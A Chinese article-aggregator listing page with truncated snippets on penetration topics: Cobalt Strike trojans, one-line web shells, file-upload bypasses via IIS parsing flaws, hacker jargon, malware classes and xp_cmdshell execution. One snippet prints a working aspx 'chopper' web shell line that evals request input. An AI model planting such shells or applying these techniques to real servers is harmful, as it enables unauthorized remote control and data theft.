Cobalt Strike(简称CS)有很多功能,这篇文章主要介绍最基本的功能:通过exe木马实现远程控制。 CS分为两部分:客户端和Team Server服务端。这两部分都依赖Java 1.8,所以运行CS程序前要安装JRE。 分享一个Cobalt Strike v3.8的试用版,可长期试用。百度 ...
分类:
其他好文 时间:
2019-05-18 19:05:21
阅读次数:
203
aspx木马收集: <%@ Page Language="Jscript"%><%eval(Request.Item["chopper"],"unsafe");%> 随日期变化的连接密码, Asp.NET服务端写法: <%@ Page Language="Jscript"%><%eval(Reque ...
分类:
Web程序 时间:
2019-05-17 19:23:10
阅读次数:
656
首先找到这个熟悉的界面 点击确定的时候抓包, 这时候虽然我们并未提交,但是刚才上传的一句话木马其实已经传到服务器里了 Response返回包里查看 ...
分类:
Web程序 时间:
2019-05-17 16:38:06
阅读次数:
127
什么是一句话木马 一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数中变形,但本质是不变的:木马的函数执行了我们发送的命令。 我们如何发送命令,发送的命令如何执行? 我们可以通过 GET、POST、COOKIE这三种方式向一个网站提 ...
分类:
Web程序 时间:
2019-05-05 23:19:30
阅读次数:
513
1.肉鸡:所谓“肉鸡”是一种很形象的比方,比方那些能够随意被我们操控的电脑,对方可所以WINDOWS体系,也可所以UNIX/LINUX体系,可所以一般的个人电脑,也可所以大型的服务器,我们能够象操作自己的电脑那样来操作它们,而不被对方所发觉。 2.木马:就是那些表面上伪装成了正常的程序,可是当这些被 ...
分类:
其他好文 时间:
2019-04-29 00:24:49
阅读次数:
200
网络攻防第九周 教材学习总结 恶意代码指的是使计算机按照攻击者的意图执行以达到恶意目标的指令集。恶意代码可以根据其执行方式,传播方式和对攻击者目标的影响分为计算机病毒,蠕虫,恶意移动代码,特洛伊木马,后门,僵尸程序,内核套件等。 计算机病毒是一种能够自我复制的代码,通过将自身嵌入其他程序进行感染,而 ...
分类:
其他好文 时间:
2019-04-22 21:03:47
阅读次数:
145
下面实例都是在墨者学院靶场做的,几种常见的上传姿势 1.结合iis5.x/6.0解析漏洞上传文件 先上传一个asp文件,抓包看看返回结果是什么 由上图我们可以知道服务器是iis6.0,接下来我们利用iis6.0解析漏洞来上传我们的一句话,添加一个asp目录 2.一句话木马图片 分析上图,先上传php ...
分类:
Web程序 时间:
2019-04-22 13:54:55
阅读次数:
153
黑客专业术语全篇 1、肉鸡: 所谓“肉鸡”是一种很形象的比喻,比喻那些可以随意被我们控制的电脑,对方可以是WINDOWS系统,也可以是UNIX/LINUX系统,可以是普通的个人电脑,也可以是大型的服务器,我们可以象操作自己的电脑那样来操作它们,而不被对方所发觉。 2、木马: 就是那些表面上伪装成了正 ...
分类:
其他好文 时间:
2019-04-21 10:07:13
阅读次数:
194
预备知识: 将一个程序放入到后台,悄悄的执行 ./xxx.sh & 进程: 用户进程:由用户来管理 系统进程:由系统内核自行管理 系统中的每个进程,都有一个位置的ID,这就是pid,而且每次启动进程以后,PID都不相同 进程相关的命令 jobs 作用:查看当前运行在后台的进程有哪些 信息 第一列:进 ...
分类:
系统相关 时间:
2019-04-16 14:47:28
阅读次数:
212
一、SA权限执行命令,如何更快捷的获取结果? 有显示位 显示位 其实这里的关键并不是有无显示位。exec master..xp_cmdshell 'systeminfo'生成的数据写进一张表的时候,会产生很多行。而我们要做的就是如何很多行通过显示位、或者报错语句一次性爆出来,这里的关键就是多行合一。 ...
分类:
数据库 时间:
2019-04-10 15:19:04
阅读次数:
144
